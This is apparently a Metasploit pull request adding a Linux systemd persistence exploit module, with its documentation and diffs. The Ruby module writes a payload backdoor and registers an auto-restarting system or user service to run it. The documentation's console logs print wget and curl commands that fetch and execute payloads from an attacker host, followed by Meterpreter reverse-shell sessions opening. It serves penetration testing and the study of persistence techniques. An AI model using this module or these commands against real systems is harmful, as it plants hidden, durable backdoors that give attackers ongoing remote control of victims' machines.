### PR TITLE
update systemd to persistence mixin

### DIFF
--- a/documentation/modules/exploit/linux/persistence/init_systemd.md
+++ b/documentation/modules/exploit/linux/persistence/init_systemd.md
@@ -1,0 +1,208 @@
+## Vulnerable Application
+
+This module will create a service on the box, and mark it for auto-restart.
+We need enough access to write service files and potentially restart services
+systemd should be available on the following systems:
+
+Targets:
+
+* CentOS 7
+* Debian >= 7, <=8
+* Fedora >= 15
+* Ubuntu >= 15.04
+
+Verified on Ubuntu 18.04.3
+
+## Verification Steps
+
+1. Exploit a box
+2. `use exploit/linux/persistence/init_systemd`
+3. `set SESSION <session>`
+4. `set PAYLOAD <payload>`
+5. `set LHOST <lhost>`
+6. `exploit`
+
+## Options
+
+### SERVICE
+
+The name of the service to create.  If not chosen, a random one is created.
+
+### PAYLOAD_NAME
+
+The name of the file to write with our shell if a non-cmd payload is used.  If not chosen, a random one is created.
+
+### Target: systemd
+
+Requires `root` permission, or equivalent. Installs the service into `/lib/systemd/system/#{service_filename}.service`
+
+### Target: systemd user
+
+Requires user level permission. Installs the service into `#{home}/.config/systemd/user/#{service_filename}.service`
+
+## Scenarios
+
+### Ubuntu 18.04
+
+#### user
+
+Initial access vector via web delivery
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set srvport 8181
+srvport => 8181
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4545
+lport => 4545
+resource (/root/.msf4/msfconsole.rc)> set URIPATH l
+URIPATH => l
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 111.111.1.111:4545 
+[*] Using URL: http://111.111.1.111:8181/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO A0IMfkxw --no-check-certificate http://111.111.1.111:8181/l; chmod +x A0IMfkxw; ./A0IMfkxw& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
+[*] 222.222.2.222    web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:35670) at 2025-02-12 16:51:31 -0500
+```
+
+Persistence
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_systemd 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > set target 1
+target => 1
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > exploit
+[*] Command to run on remote host: curl -so ./AfUflryvMrcV http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./AfUflryvMrcV;./AfUflryvMrcV&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/persistence/init_systemd) > 
+[*] Fetch handler listening on 111.111.1.111:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
+[+] The target appears to be vulnerable. /tmp/ is writable and system is systemd based
+[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
+[*] Writing backdoor to /tmp//wiyCnjJRK
+[*] Creating user service directory
+[*] Writing service: /home/ubuntu/.config/systemd/user/hakiMwGMnXA.service
+[*] Reloading manager configuration
+[*] Enabling service
+[*] Starting service: hakiMwGMnXA
+[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
+[*] Sending payload to 222.222.2.222 (curl/7.58.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250212.5212/ubuntu18desktop.local_20250212.5212.rc
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:58360) at 2025-02-12 16:52:13 -0500
+[msf](Jobs:2 Agents:2) exploit(linux/persistence/init_systemd) > sessions -i 2
+[*] Starting interaction with 2...
+(Meterpreter 2)(/home/ubuntu) > sysinfo
+Computer     : ubuntu18desktop.local
+OS           : Ubuntu 18.04 (Linux 5.3.0-26-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 2)(/home/ubuntu) > getuid
+Server username: ubuntu
+```
+
+#### root
+
+Initial access vector via web delivery
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set srvport 8181
+srvport => 8181
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4545
+lport => 4545
+resource (/root/.msf4/msfconsole.rc)> set URIPATH l
+URIPATH => l
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 111.111.1.111:4545 
+[*] Using URL: http://111.111.1.111:8181/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO Xz9l4YxP --no-check-certificate http://111.111.1.111:8181/l; chmod +x Xz9l4YxP; ./Xz9l4YxP& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:35802) at 2025-02-12 16:54:10 -0500
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+(Meterpreter 1)(/home/ubuntu) > getuid
+Server username: root
+(Meterpreter 1)(/home/ubuntu) > sysinfo
+Computer     : ubuntu18desktop.local
+OS           : Ubuntu 18.04 (Linux 5.3.0-26-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 1)(/home/ubuntu) > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_systemd 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_systemd) > exploit
+[*] Command to run on remote host: curl -so ./pCnRnSfZCFa http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./pCnRnSfZCFa;./pCnRnSfZCFa&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/persistence/init_systemd) > 
+[*] Fetch handler listening on 111.111.1.111:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
+[+] The target appears to be vulnerable. /tmp/ is writable and system is systemd based
+[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
+[*] Writing backdoor to /tmp//nfiWHmr
+[*] Writing service: /lib/systemd/system/SBFzvKrWjH.service
+[*] Enabling service
+[*] Starting service
+[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
+[*] Sending payload to 222.222.2.222 (curl/7.58.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250212.5514/ubuntu18desktop.local_20250212.5514.rc
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:58406) at 2025-02-12 16:55:15 -0500
+```

--- a/modules/exploits/linux/persistence/init_systemd.rb
+++ b/modules/exploits/linux/persistence/init_systemd.rb
@@ -1,0 +1,217 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE # for generate_payload_exe
+  include Msf::Post::Linux::User # get_home_dir
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/linux/local/service_persistence'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Service SystemD Persistence',
+        'Description' => %q{
+          This module will create a service on the box, and mark it for auto-restart.
+          We need enough access to write service files and potentially restart services
+          Targets:
+          CentOS 7
+          Debian >= 7, <=8
+          Fedora >= 15
+          Ubuntu >= 15.04
+          Verified on Ubuntu 18.04.3
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die <mike@shorebreaksecurity.com>',
+          'Cale Black' # user target
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Privileged' => true,
+        'Targets' => [
+          ['systemd', {}],
+          ['systemd user', {}]
+        ],
+        'DefaultTarget' => 0,
+        'Arch' => [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+        'References' => [
+          ['URL', 'https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples'],
+          ['URL', 'https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/'],
+          ['URL', 'https://attack.mitre.org/techniques/T1543/']
+        ],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        },
+        'DisclosureDate' => '2010-03-30' # systemd release date
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('PAYLOAD_NAME', [false, 'Name of shell file to write']),
+        OptString.new('SERVICE', [false, 'Name of service to create']),
+        OptString.new('USER', [ false, 'User to target, or current user if blank', '' ], conditions: ['Targets', '==', 'systemd user']),
+      ]
+    )
+    register_advanced_options(
+      [
+        OptBool.new('EnableService', [true, 'Enable the service', true])
+      ]
+    )
+  end
+
+  def check
+    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('/tmp')
+    print_warning('User doesnt have root permissions, yet target set to systemd, likely need to change target to systemd user.') if target.name == 'systemd' && !is_root?
+    return CheckCode::Safe("#{datastore['WritableDir']} doesnt exist") unless exists?(datastore['WritableDir'])
+    return CheckCode::Safe("#{datastore['WritableDir']} isnt writable") unless writable?(datastore['WritableDir'])
+    return CheckCode::Safe('Likely not a systemd based system') unless command_exists?('systemctl')
+
+    CheckCode::Appears("#{datastore['WritableDir']} is writable and system is systemd based")
+  end
+
+  def target_user
+    return datastore['USER'] unless datastore['USER'].blank?
+
+    whoami
+  end
+
+  def install_persistence
+    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('/tmp')
+    backdoor = write_shell(datastore['WritableDir'])
+
+    path = backdoor.split('/')[0...-1].join('/')
+    file = backdoor.split('/')[-1]
+    case target.name
+    when 'systemd'
+      systemd(path, file)
+    when 'systemd user'
+      systemd_user(path, file)
+    end
+  end
+
+  def write_shell(path)
+    file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)
+    backdoor = "#{path}/#{file_name}"
+    vprint_status("Writing backdoor to #{backdoor}")
+    if payload.arch.first == 'cmd'
+      write_file(backdoor, payload.encoded)
+      chmod(backdoor, 0o755)
+    else
+      upload_and_chmodx backdoor, generate_payload_exe
+    end
+    @clean_up_rc << "rm #{backdoor}\n"
+
+    fail_with(Failure::NoAccess, 'File not written, check permissions.') unless file_exist?(backdoor)
+
+    backdoor
+  end
+
+  def service_file(exec, target = 'multi-user.target')
+    <<~EOF
+      [Unit]
+        Description=Start daemon at boot time
+        After=
+        Requires=
+        [Service]
+        RestartSec=10s
+        Restart=always
+        TimeoutStartSec=5
+        RemainAfterExit=yes
+        ExecStart=#{exec}
+      [Install]
+      WantedBy=#{target}
+    EOF
+  end
+
+  def systemd(backdoor_path, backdoor_file)
+    if payload.arch.first == 'cmd'
+      script = service_file("/bin/sh #{backdoor_path}/#{backdoor_file}")
+    else
+      script = service_file("#{backdoor_path}/#{backdoor_file}")
+    end
+
+    service_filename = datastore['SERVICE'] || Rex::Text.rand_text_alpha(7..12)
+    service_name = "/lib/systemd/system/#{service_filename}.service"
+    vprint_status("Writing service: #{service_name}")
+    write_file(service_name, script)
+
+    fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?("/lib/systemd/system/#{service_filename}.service")
+
+    @clean_up_rc << "rm #{service_name}\n"
+    if datastore['EnableService']
+      vprint_status('Enabling service')
+      cmd_exec("systemctl enable #{service_filename}.service")
+    end
+    vprint_status('Starting service')
+    cmd_exec("systemctl start #{service_filename}.service")
+  end
+
+  def systemd_user(backdoor_path, backdoor_file)
+    if payload.arch.first == 'cmd'
+      script = service_file("/bin/sh #{backdoor_path}/#{backdoor_file}", 'default.target')
+    else
+      script = service_file("#{backdoor_path}/#{backdoor_file}", 'default.target')
+    end
+    service_filename = datastore['SERVICE'] || Rex::Text.rand_text_alpha(7..12)
+
+    user = target_user
+    home = get_home_dir(user)
+    vprint_status('Creating user service directory')
+    cmd_exec("mkdir -p #{home}/.config/systemd/user")
+
+    service_name = "#{home}/.config/systemd/user/#{service_filename}.service"
+    vprint_status("Writing service: #{service_name}")
+
+    write_file(service_name, script)
+    @clean_up_rc << "rm #{service_name}\n"
+
+    if !file_exist?(service_name)
+      print_error('File not written, check permissions. Attempting secondary location')
+      vprint_status('Creating user secondary service directory')
+      cmd_exec("mkdir -p #{home}/.local/share/systemd/user")
+
+      service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
+      vprint_status("Writing .local service: #{service_name}")
+      write_file(service_name, script)
+      fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?("#{home}/.local/share/systemd/user/#{service_filename}.service")
+    end
+
+    # This was taken from pam_systemd(8)
+    systemd_socket_id = cmd_exec('id -u')
+    systemd_socket_dir = "/run/user/#{systemd_socket_id}"
+    vprint_status('Reloading manager configuration')
+    cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user daemon-reload")
+
+    if datastore['EnableService']
+      vprint_status('Enabling service')
+      cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user enable #{service_filename}.service")
+    end
+
+    vprint_status("Starting service: #{service_filename}")
+    # Prefer restart over start, as it will execute already existing service files
+    cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user restart #{service_filename}")
+  end
+end

--- a/modules/exploits/linux/persistence/init_systemd.rb
+++ b/modules/exploits/linux/persistence/init_systemd.rb
@@ -83,13 +83,13 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('/tmp')
+    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')
     print_warning('User doesnt have root permissions, yet target set to systemd, likely need to change target to systemd user.') if target.name == 'systemd' && !is_root?
-    return CheckCode::Safe("#{datastore['WritableDir']} doesnt exist") unless exists?(datastore['WritableDir'])
-    return CheckCode::Safe("#{datastore['WritableDir']} isnt writable") unless writable?(datastore['WritableDir'])
+    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
+    return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
     return CheckCode::Safe('Likely not a systemd based system') unless command_exists?('systemctl')
 
-    CheckCode::Appears("#{datastore['WritableDir']} is writable and system is systemd based")
+    CheckCode::Appears("#{writable_dir} is writable and system is systemd based")
   end
 
   def target_user
@@ -99,8 +99,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def install_persistence
-    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('/tmp')
-    backdoor = write_shell(datastore['WritableDir'])
+    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')
+    backdoor = write_shell(writable_dir)
 
     path = backdoor.split('/')[0...-1].join('/')
     file = backdoor.split('/')[-1]
@@ -158,7 +158,7 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_status("Writing service: #{service_name}")
     write_file(service_name, script)
 
-    fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?("/lib/systemd/system/#{service_filename}.service")
+    fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?(service_name)
 
     @clean_up_rc << "rm #{service_name}\n"
     if datastore['EnableService']
@@ -196,7 +196,8 @@ class MetasploitModule < Msf::Exploit::Local
       service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
       vprint_status("Writing .local service: #{service_name}")
       write_file(service_name, script)
-      fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?("#{home}/.local/share/systemd/user/#{service_filename}.service")
+      fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?(service_name)
+      @clean_up_rc << "rm #{service_name}\n"
     end
 
     # This was taken from pam_systemd(8)

--- a/modules/exploits/linux/persistence/init_systemd.rb
+++ b/modules/exploits/linux/persistence/init_systemd.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Local
         'References' => [
           ['URL', 'https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples'],
           ['URL', 'https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/'],
-          ['ATT&CK', Mitre::Attack::Technique::T1543_CREATE_OR_MODIFY_SYSTEM_PROCESS]
+          ['ATT&CK', Mitre::Attack::Technique::T1543_002_SYSTEMD_SERVICE]
         ],
         'SessionTypes' => ['shell', 'meterpreter'],
         'Notes' => {

--- a/modules/exploits/linux/persistence/init_systemd.rb
+++ b/modules/exploits/linux/persistence/init_systemd.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Local
         'References' => [
           ['URL', 'https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples'],
           ['URL', 'https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/'],
-          ['URL', 'https://attack.mitre.org/techniques/T1543/']
+          ['ATT&CK', Mitre::Attack::Technique::T1543_CREATE_OR_MODIFY_SYSTEM_PROCESS]
         ],
         'SessionTypes' => ['shell', 'meterpreter'],
         'Notes' => {


### PR DESCRIPTION
Pulls out systemd from the init persistence module and adds new persistence mixin. Part of #20374


## Verification

- [x] Start `msfconsole`
- [x] exploit the box somehow (`ssh_login` for instance)
- [x] `use exploit/linux/persistence/init_systemd`
- [x] `set SESSION <id>`
- [x] `exploit`
- [x] **Verify** persistence is created, and you get a new session if apt is run
- [x] **Verify** cleanup works
- [x] **Document** is updated and correct